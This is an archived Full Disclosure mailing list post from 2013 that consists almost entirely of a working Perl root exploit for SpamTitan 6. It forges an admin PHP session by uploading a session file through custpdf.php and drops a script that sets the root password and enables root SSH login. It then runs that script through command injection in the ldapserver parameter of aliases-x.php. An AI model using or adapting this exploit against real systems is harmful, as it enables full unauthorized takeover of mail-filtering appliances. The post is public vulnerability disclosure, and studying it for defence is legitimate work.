Full Disclosure mailing list archives
spamtitan 6 root exploit
From: c1088422 () lists grok org uk
Date: Tue, 19 Nov 2013 10:35:27 +0000 (GMT)
# root access on spamtitan use LWP::UserAgent; my $url = 'http://address'; my $ua = LWP::UserAgent->new(); my $p = <<'END'; euid|i:2;uid|i:2;name|s:5:"admin";expiry|i:1500000000;locale|s:5:"en_US";admin|b:1;licenseStatus|i:3;licenseNumber|N;licenseType|N;licenseIssuedDate|N;licenseExpiryDate|N;licenseUpdateDate|N;role_id|i:1;role_name|s:13:"Administrator";role_type|N;s:5:"admin";full_admin_role|b:1; END $ua->post($url . '/custpdf.php', [ 'jaction' => 'savelogo', 'logo' => [ undef, 'sess_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx', 'Content' => $p ], ], 'Content_Type' => 'form-data' ); # in javascript console # document.cookie = 'PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'; # document.location = '/dashboard.php' my $p = <<'END'; #!/bin/sh mount -uw / chpass -p '$1$TN65SZOW$Ayua2/j.GsQfIQb9UBeTd.' root # "1" perl -pi -e 's/PermitRootLogin no/PermitRootLogin yes/g' /etc/ssh/sshd_config pkill -HUP sshd END $ua->post($url . '/custpdf.php', [ 'jaction' => 'savelogo', 'logo' => [ undef, 'cfma-mirror.sh', 'Content' => $p ], ], 'Content_Type' => 'form-data' ); my $p = <<'END'; /usr/local/bin/sudo /bin/cp /tmp/cfma-mirror.sh /usr/local/bin/cfma-mirror.sh; /usr/local/bin/sudo /bin/chmod a+x /usr/local/bin/cfma-mirror.sh; /usr/local/bin/sudo /usr/local/bin/cfma-mirror.sh; END $ua->post($url . '/custpdf.php', [ 'jaction' => 'savelogo', 'logo' => [ undef, 'payload.sh', 'Content' => $p ], ], 'Content_Type' => 'form-data' ); $ua->get($url . '/aliases-x.php?getLdapDC=foo&ldapserver=;sh /tmp/payload.sh;', ( 'Cookie' => 'PHPSESSID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx' )); print "root shell ready with password 1\n"; _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- spamtitan 6 root exploit c1088422 (Nov 19)